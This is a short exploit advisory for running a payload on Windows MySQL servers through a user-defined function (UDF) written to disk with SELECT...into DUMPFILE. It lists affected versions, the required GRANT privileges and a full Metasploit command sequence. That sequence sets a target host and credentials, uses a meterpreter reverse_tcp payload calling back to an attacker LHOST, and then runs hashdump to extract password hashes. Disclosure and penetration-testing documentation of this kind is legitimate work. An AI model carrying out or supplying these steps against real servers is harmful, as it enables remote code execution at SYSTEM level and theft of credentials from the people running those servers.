Oracle MySQL UDF for Microsoft Windows Metasploit Payload Execution

Timeline :

The vulnerability seem to exist since 2007 !
Vulnerability discovered and disclosed by Bernardo Damele the 2009-01-16
Metasploit PoC provided by todb the 2011-03-08

PoC provided by :

Bernardo Damele
todb

Reference(s) :

NONE

Affected version(s) :

All Microsoft Windows MySQL, how support UDF, due to the fact that default MySQL installation is done with SYSTEM privileges.

Tested on Windows XP SP3 with :

MySQL Community 5.5.9

Description :

This module creates and enables a custom UDF (user defined function) on the target host via the SELECT … into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (=< 5.5.9), directory write permissions not enforced, and the MySQL service runs as LocalSystem. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions.

To exploit this weakness, the MySQL targeted user should have the following global privileges :

grant select,insert,file, create routine,alter routine,execute on *.* to test3@’%’ identified by ‘test3’;

Commands :

use exploit/windows/mysql/mysql_payload
set RHOST 192.168.178.41
set USERNAME test3
set PASSWORD test3

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
hashdump